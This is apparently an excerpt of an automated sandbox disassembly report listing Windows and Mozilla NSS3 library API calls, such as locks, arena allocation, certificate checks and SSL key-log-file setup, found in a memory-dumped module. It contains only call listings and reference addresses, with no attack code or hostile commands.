                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6C46221C
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C4622C2
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C4622CD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4622DD
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
                                                                                                                                                                                                                                                      • String ID: T ]l$X ]l
                                                                                                                                                                                                                                                      • API String ID: 3559583721-1146210263
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47DDDE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C47DDF5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47DE34
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C47DE93
                                                                                                                                                                                                                                                      • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C47DE9D
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C47DEB4
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DEC3
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C47DED8
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s%s,?,?), ref: 6C47DEF0
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6C5AAAF9,(NULL) (Validity Unknown)), ref: 6C47DF04
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF13
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DF22
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C47DF33
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C47DF3C
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF4B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C47DF74
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47DF8E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                      • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                      • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C4B2DEC
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C4B2E00
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E2B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E43
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000,?), ref: 6C4B2E74
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000), ref: 6C4B2E88
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EC6
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EE4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EF8
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B2F62
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B2F86
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B2F9E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B2FCA
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B301A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B302E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3066
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3085
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B30EC
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B310C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3124
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B314C
                                                                                                                                                                                                                                                        • Part of subcall function 6C499180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C49918D
                                                                                                                                                                                                                                                        • Part of subcall function 6C499180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C4991A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B316D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3383223490-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C499FBE
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C49A015
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C4B195C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: EnterCriticalSection.KERNEL32(?,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B1970
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5), ref: 6C4B19A0
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A067
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A055
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A07E
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A0B1
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A0C7
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A0CF
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A12E
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C49A140
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A148
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A158
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C49A175
                                                                                                                                                                                                                                                      • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C49A1A5
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49A1B2
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C49A1C6
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6C49A1D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5,00000003,-00000004,00000000,?,6C48EAC5), ref: 6C4B5627
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B), ref: 6C4B564F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B5661
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5), ref: 6C4B56AF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D4F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4DB7
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4DD7
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4DEC
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4E1B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E2F
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4E5A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E71
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B4E7A
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4EA2
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B4EC1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B4ED6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B4F01
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B4F2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 759471828-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFD6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFE6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFF6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0006
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0016
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0026
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0036
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0046
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0056
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0066
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0076
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0086
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0096
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00A6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00B6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00C6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00D6
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00E6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1407103528-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C506BF7), ref: 6C506EB6
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C5AFC0A,6C506BF7), ref: 6C506ECD
                                                                                                                                                                                                                                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C506EE0
                                                                                                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C506EFC
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C506F04
                                                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C506F18
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C506BF7), ref: 6C506F30
